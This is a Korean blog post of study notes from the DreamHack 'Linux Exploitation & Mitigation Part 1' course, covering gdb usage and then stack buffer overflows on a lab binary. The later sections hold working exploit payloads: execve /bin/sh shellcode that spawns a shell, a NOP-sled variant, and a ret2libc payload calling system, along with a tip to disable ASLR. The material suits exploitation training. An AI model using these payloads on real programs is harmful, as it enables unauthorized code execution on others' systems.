4 DreamHack Linux Exploitation & Mitigation Part 1

삽질기

Linux Exploitation & Mitigation Part 1

breakpoint 넣을때 주의점.

breakpoint는 실제 실행주소를 중단한다.
따라서 파일을 그대로 읽을 시에나오는 주소는 실제 실행주소가 아니기에
한번 실행함으로 실제 메모리에 붙어있는 주소를 가지고 해야함. 안그러면 이런 오류 생김
- Cannot insert breakpoint 1.
- Cannot access memory at address 0x66f

gdb ./example0
set disassembly-flavor intel
 show disassembly-flavor

break ,b
r, run
info break
info reg
print p
q
x/2wx x/s
c continue
nexti ni

// gcc -o example0 example0.c -m32
#include <stdio.h>

int main(void){
  int sum = 0;
  int val1 = 1;
  int val2 = 2;
  sum = val1 + val2;
  printf("1 + 2 = %d\n", sum);
  return 0;
}

gdb example0

GNU gdb (Ubuntu 8.1-0ubuntu3.2) 8.1.0.20180409-git
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from example0...done.
(gdb) disas main
Dump of assembler code for function main:
   0x000000000000064a <+0>:	push   rbp
   0x000000000000064b <+1>:	mov    rbp,rsp
   0x000000000000064e <+4>:	sub    rsp,0x10
   0x0000000000000652 <+8>:	mov    DWORD PTR [rbp-0xc],0x0
   0x0000000000000659 <+15>:	mov    DWORD PTR [rbp-0x8],0x1
   0x0000000000000660 <+22>:	mov    DWORD PTR [rbp-0x4],0x2
   0x0000000000000667 <+29>:	mov    edx,DWORD PTR [rbp-0x8]
   0x000000000000066a <+32>:	mov    eax,DWORD PTR [rbp-0x4]
   0x000000000000066d <+35>:	add    eax,edx
   0x000000000000066f <+37>:	mov    DWORD PTR [rbp-0xc],eax
   0x0000000000000672 <+40>:	mov    eax,DWORD PTR [rbp-0xc]
   0x0000000000000675 <+43>:	mov    esi,eax
   0x0000000000000677 <+45>:	lea    rdi,[rip+0x96]        # 0x714
   0x000000000000067e <+52>:	mov    eax,0x0
   0x0000000000000683 <+57>:	call   0x520 <printf@plt>
   0x0000000000000688 <+62>:	mov    eax,0x0
   0x000000000000068d <+67>:	leave  
   0x000000000000068e <+68>:	ret    
End of assembler dump.

(gdb) b *0x000000000000066f
Breakpoint 1 at 0x66f: file example0.c, line 7.
(gdb) r
Starting program: /home/ubuntu/asm/example0 
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x66f

이상황에서는 제대로 작동하지 않음을 알 수 있다.

(gdb) disas main
Dump of assembler code for function main:
   0x000055555555464a <+0>:	push   rbp
   0x000055555555464b <+1>:	mov    rbp,rsp
   0x000055555555464e <+4>:	sub    rsp,0x10
   0x0000555555554652 <+8>:	mov    DWORD PTR [rbp-0xc],0x0
   0x0000555555554659 <+15>:	mov    DWORD PTR [rbp-0x8],0x1
   0x0000555555554660 <+22>:	mov    DWORD PTR [rbp-0x4],0x2
   0x0000555555554667 <+29>:	mov    edx,DWORD PTR [rbp-0x8]
   0x000055555555466a <+32>:	mov    eax,DWORD PTR [rbp-0x4]
   0x000055555555466d <+35>:	add    eax,edx
   0x000055555555466f <+37>:	mov    DWORD PTR [rbp-0xc],eax
   0x0000555555554672 <+40>:	mov    eax,DWORD PTR [rbp-0xc]
   0x0000555555554675 <+43>:	mov    esi,eax
   0x0000555555554677 <+45>:	lea    rdi,[rip+0x96]        # 0x555555554714
   0x000055555555467e <+52>:	mov    eax,0x0
   0x0000555555554683 <+57>:	call   0x555555554520 <printf@plt>
   0x0000555555554688 <+62>:	mov    eax,0x0
   0x000055555555468d <+67>:	leave  
   0x000055555555468e <+68>:	ret    
End of assembler dump.

 x/2wx $esp
0xffffffffffffdec0:	Cannot access memory at address 0xffffffffffffdec0

ps -aux | grep read_write
$ pidof read_write
$ pgrep read_write
gdb -q -p 77422 (root모드에서 해야함)

   0x000005cd <+0>:	lea    ecx,[esp+0x4]
   0x000005d1 <+4>:	and    esp,0xfffffff0
   0x000005d4 <+7>:	push   DWORD PTR [ecx-0x4]
   0x000005d7 <+10>:	push   ebp
   0x000005d8 <+11>:	mov    ebp,esp
   0x000005da <+13>:	push   edi
   0x000005db <+14>:	push   ebx
   0x000005dc <+15>:	push   ecx
   0x000005dd <+16>:	sub    esp,0x5c
   0x000005e0 <+19>:	call   0x4d0 <__x86.get_pc_thunk.bx>
   0x000005e5 <+24>:	add    ebx,0x19eb
   0x000005eb <+30>:	mov    eax,gs:0x14
   0x000005f1 <+36>:	mov    DWORD PTR [ebp-0x1c],eax
   0x000005f4 <+39>:	xor    eax,eax
   0x000005f6 <+41>:	lea    edx,[ebp-0x5c]
   0x000005f9 <+44>:	mov    eax,0x0
   0x000005fe <+49>:	mov    ecx,0x10

info functions 함수의 이름과 주소를 출력
disassemble main main 함수의 디스어셈블리를 출력
break 주소에 breakpoint를 설정
info breakpoints breakpoint 정보 출력
run 프로그램을 처음부터 실행
display 매 실행 시 인자로 전달된 값을 출력
continue 다음 브레이크포인트까지 실행
si step instruction, 명령어 1개 실행
finish 현재 함수를 모두 실행
info register 레지스터 정보 출력
x/ 지정된 메모리 영역을 특정 단위로 표현
p print, 인자로 전달된 값을 출력
delete [break number] 브레이크포인트 번호에 해당하는 브레이크포인트 삭제
quit gdb 종료

Process Attach

ubuntu@ubuntu-virtual-machine:~/asm$ gdb -q -p 4141
Attaching to process 4141
Could not attach to process.  If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user.  For more details, see /etc/sysctl.d/10-ptrace.conf
ptrace: Operation not permitted.
(gdb) q
ubuntu@ubuntu-virtual-machine:~/asm$ sudo gdb -q -p 4141
[sudo] password for ubuntu: 
Attaching to process 4141
Reading symbols from /home/ubuntu/asm/read_write...(no debugging symbols found)...done.
Reading symbols from /lib32/libc.so.6...(no debugging symbols found)...done.
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
0xf7f85b59 in __kernel_vsyscall ()
(gdb) 

(gdb) disas main
Dump of assembler code for function main:
   0x566455cd <+0>:	lea    ecx,[esp+0x4]
   0x566455d1 <+4>:	and    esp,0xfffffff0
   0x566455d4 <+7>:	push   DWORD PTR [ecx-0x4]
   0x566455d7 <+10>:	push   ebp
   0x566455d8 <+11>:	mov    ebp,esp
   0x566455da <+13>:	push   edi
   0x566455db <+14>:	push   ebx
   0x566455dc <+15>:	push   ecx
   0x566455dd <+16>:	sub    esp,0x5c
   0x566455e0 <+19>:	call   0x566454d0 <__x86.get_pc_thunk.bx>
   0x566455e5 <+24>:	add    ebx,0x19eb
   0x566455eb <+30>:	mov    eax,gs:0x14
   0x566455f1 <+36>:	mov    DWORD PTR [ebp-0x1c],eax
   0x566455f4 <+39>:	xor    eax,eax
   0x566455f6 <+41>:	lea    edx,[ebp-0x5c]
   0x566455f9 <+44>:	mov    eax,0x0
   0x566455fe <+49>:	mov    ecx,0x10
   0x56645603 <+54>:	mov    edi,edx
   0x56645605 <+56>:	rep stos DWORD PTR es:[edi],eax
   0x56645607 <+58>:	sub    esp,0xc
   0x5664560a <+61>:	lea    eax,[ebx-0x18c0]
   0x56645610 <+67>:	push   eax
   0x56645611 <+68>:	call   0x56645440 <printf@plt>
   0x56645616 <+73>:	add    esp,0x10
   0x56645619 <+76>:	sub    esp,0x8
   0x5664561c <+79>:	lea    eax,[ebp-0x5c]
   0x5664561f <+82>:	push   eax
   0x56645620 <+83>:	lea    eax,[ebx-0x18b7]
   0x56645626 <+89>:	push   eax
   0x56645627 <+90>:	call   0x56645470 <__isoc99_scanf@plt>
   0x5664562c <+95>:	add    esp,0x10
   0x5664562f <+98>:	sub    esp,0x8
   0x56645632 <+101>:	lea    eax,[ebp-0x5c]
   0x56645635 <+104>:	push   eax
   0x56645636 <+105>:	lea    eax,[ebx-0x18b2]
   0x5664563c <+111>:	push   eax
   0x5664563d <+112>:	call   0x56645440 <printf@plt>
   0x56645642 <+117>:	add    esp,0x10
   0x56645645 <+120>:	mov    eax,0x0
   0x5664564a <+125>:	mov    edx,DWORD PTR [ebp-0x1c]
   0x5664564d <+128>:	xor    edx,DWORD PTR gs:0x14
   0x56645654 <+135>:	je     0x5664565b <main+142>
   0x56645656 <+137>:	call   0x566456e0 <__stack_chk_fail_local>
   0x5664565b <+142>:	lea    esp,[ebp-0xc]
---Type <return> to continue, or q <return> to quit---
   0x5664565e <+145>:	pop    ecx
   0x5664565f <+146>:	pop    ebx
   0x56645660 <+147>:	pop    edi
   0x56645661 <+148>:	pop    ebp
   0x56645662 <+149>:	lea    esp,[ecx-0x4]
   0x56645665 <+152>:	ret    
End of assembler dump.

(gdb) b *0x5664562c
Breakpoint 1 at 0x5664562c
(gdb) c
Continuing.

Breakpoint 1, 0x5664562c in main ()
(gdb) x/4wx $ebp-0x5c
0xff834c9c:	0x64636261	0x34333231	0x00000000	0x00000000

Return Address Overwrite

 0x5655554d <+0>:	push   ebp
   0x5655554e <+1>:	mov    ebp,esp
   0x56555550 <+3>:	push   ebx
   0x56555551 <+4>:	sub    esp,0x20
   0x56555554 <+7>:	call   0x56555549 <__x86.get_pc_thunk.dx>
   0x56555559 <+12>:	add    edx,0x1a7b
   0x5655555f <+18>:	mov    ebx,0x0
   0x56555564 <+23>:	mov    eax,0x20
   0x56555569 <+28>:	and    eax,0xfffffffc
   0x5655556c <+31>:	mov    ecx,eax
   0x5655556e <+33>:	mov    eax,0x0
   0x56555573 <+38>:	mov    DWORD PTR [ebp+eax*1-0x24],ebx
   0x56555577 <+42>:	add    eax,0x4
   0x5655557a <+45>:	cmp    eax,ecx
   0x5655557c <+47>:	jb     0x56555573 <vuln+38>
   0x5655557e <+49>:	push   DWORD PTR [ebp+0x8]
   0x56555581 <+52>:	lea    eax,[ebp-0x24]
   0x56555584 <+55>:	push   eax
   0x56555585 <+56>:	mov    ebx,edx
   0x56555587 <+58>:	call   0x565553d0 <strcpy@plt>
   0x5655558c <+63>:	add    esp,0x8
   0x5655558f <+66>:	mov    eax,0x0
---Type <return> to continue, or q <return> to quit---
   0x56555594 <+71>:	mov    ebx,DWORD PTR [ebp-0x4]
   0x56555597 <+74>:	leave  
   0x56555598 <+75>:	ret    

b*0x5655554d
r aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllll
x/2wx $esp

0xffffd07c:	0x565555c4	0xffffd30b
x/i 0x565555c4
x/s 0xffffd30b

0xffffd07c : return 주소
0x565555c4 : main 리턴주소
0xffffd30b : argv[1]

b*0x56555587
c
x/2wx $esp

0xffffd04c:	0xffffd054	0xffffd30b

0xffffd054 : buf주소
0xffffd30b : argv[1]

gdb) ni
0x5655558c in vuln ()

(gdb) x/20wx 0xffffd054
0xffffd054:	0x6161 6161	0x6262 6262 0x6363 6363	0x6464 6464
0xffffd064:	0x65656565	0x66666666	0x67676767	0x68686868
0xffffd074:	0x69696969	0x6a6a6a6a	0x6b6b6b6b	0x6c6c6c6c
0xffffd084:	0x00000000	0x00000000	0xf7dfae81	0x00000002
0xffffd094:	0xffffd124	0xffffd130	0xffffd0b4	0x00000002

0xffffd07c:   0x6b6b6b6b

실습 내용과 다르다! 실습에서는 return주소에 6a~가있음

실제로 buf[32] stack fram pointer ???? Return Adderss

0xffffd074
0xffffd078 : ebp

4 8

(gdb) info reg
eax            0xffffd054	-12204
ecx            0xffffd330	-11472
edx            0xffffd079	-12167
ebx            0x56556fd4	1448439764
esp            0xffffd04c	0xffffd04c
ebp            0xffffd078	0xffffd078
esi            0xf7fb7000	-134516736
edi            0x0	0
eip            0x5655558c	0x5655558c <vuln+63>
eflags         0x202	[ IF ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x63	99



(gdb) b*0x56555598
Breakpoint 3 at 0x56555598
(gdb) c
Continuing.

Breakpoint 3, 0x56555598 in vuln ()

(gdb) x/wx $esp
0xffffd07c:	0x6b6b6b6b

test 끝

r `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"+"A"*17+"\x04\xd0\xff\xff"'`

(gdb) r `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"+"A"*17+"\x04\xd0\xff\xff"'`
Starting program: /home/ubuntu/dreamhack/example1 `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"+"A"*17+"\x04\xd0\xff\xff"'`
process 6746 is executing new program: /bin/dash
$ is
sh: 1: is: not found
$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),127(kvm)

NOP Sled

No OPeration

./example1  `python -c 'print  "A"*40 + "\x7a\x0f\xff\xff" + "\x90"*100000 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"'`

NX bit의 등장

(gdb) disas main
Dump of assembler code for function main:
=> 0x56555599 <+0>:	push   %ebp
   0x5655559a <+1>:	mov    %esp,%ebp
   0x5655559c <+3>:	push   %ebx
   0x5655559d <+4>:	call   0x565555d1 <__x86.get_pc_thunk.ax>
   0x565555a2 <+9>:	add    $0x1a32,%eax
   0x565555a7 <+14>:	cmpl   $0x1,0x8(%ebp)
   0x565555ab <+18>:	jg     0x565555b6 <main+29>
   0x565555ad <+20>:	push   $0xffffffff
   0x565555af <+22>:	mov    %eax,%ebx
   0x565555b1 <+24>:	call   0x565553e0 <exit@plt>
   0x565555b6 <+29>:	mov    0xc(%ebp),%eax
   0x565555b9 <+32>:	add    $0x4,%eax
   0x565555bc <+35>:	mov    (%eax),%eax
   0x565555be <+37>:	push   %eax
   0x565555bf <+38>:	call   0x5655554d <vuln>
   0x565555c4 <+43>:	add    $0x4,%esp
   0x565555c7 <+46>:	mov    $0x0,%eax
   0x565555cc <+51>:	mov    -0x4(%ebp),%ebx
   0x565555cf <+54>:	leave  
   0x565555d0 <+55>:	ret    
End of assembler dump.
(gdb) info proc map
process 3449
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	0x56555000 0x56556000     0x1000        0x0 /home/ubuntu/dreamhack/example1
	0x56556000 0x56557000     0x1000        0x0 /home/ubuntu/dreamhack/example1
	0x56557000 0x56558000     0x1000     0x1000 /home/ubuntu/dreamhack/example1
	0xf7ddd000 0xf7fb2000   0x1d5000        0x0 /lib/i386-linux-gnu/libc-2.27.so
	0xf7fb2000 0xf7fb3000     0x1000   0x1d5000 /lib/i386-linux-gnu/libc-2.27.so
	0xf7fb3000 0xf7fb5000     0x2000   0x1d5000 /lib/i386-linux-gnu/libc-2.27.so
	0xf7fb5000 0xf7fb6000     0x1000   0x1d7000 /lib/i386-linux-gnu/libc-2.27.so
	0xf7fb6000 0xf7fb9000     0x3000        0x0 
	0xf7fd0000 0xf7fd2000     0x2000        0x0 
	0xf7fd2000 0xf7fd5000     0x3000        0x0 [vvar]
	0xf7fd5000 0xf7fd6000     0x1000        0x0 [vdso]
---Type <return> to continue, or q <return> to quit---
	0xf7fd6000 0xf7ffc000    0x26000        0x0 /lib/i386-linux-gnu/ld-2.27.so
	0xf7ffc000 0xf7ffd000     0x1000    0x25000 /lib/i386-linux-gnu/ld-2.27.so
	0xf7ffd000 0xf7ffe000     0x1000    0x26000 /lib/i386-linux-gnu/ld-2.27.so
	0xfffdd000 0xffffe000    0x21000        0x0 [stack]
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e1a250 <system>
(gdb) find 0xf7ddd000, 0xf7fb2000, "/bin/sh"
0xf7f5b3cf
1 pattern found.

익스코드

`python -c 'print "A"*40 + "\x50\xa2\xe1\xf7" + "BBBB" +  "\xcf\xb3\xf5\xf7"'`

이부분에서 Segmentation fault가 뜬다면 아마 ASLR일 확률이 높다. randomize_va_space를 0으로 설정해볼것.

Posted 2020-08-22

notes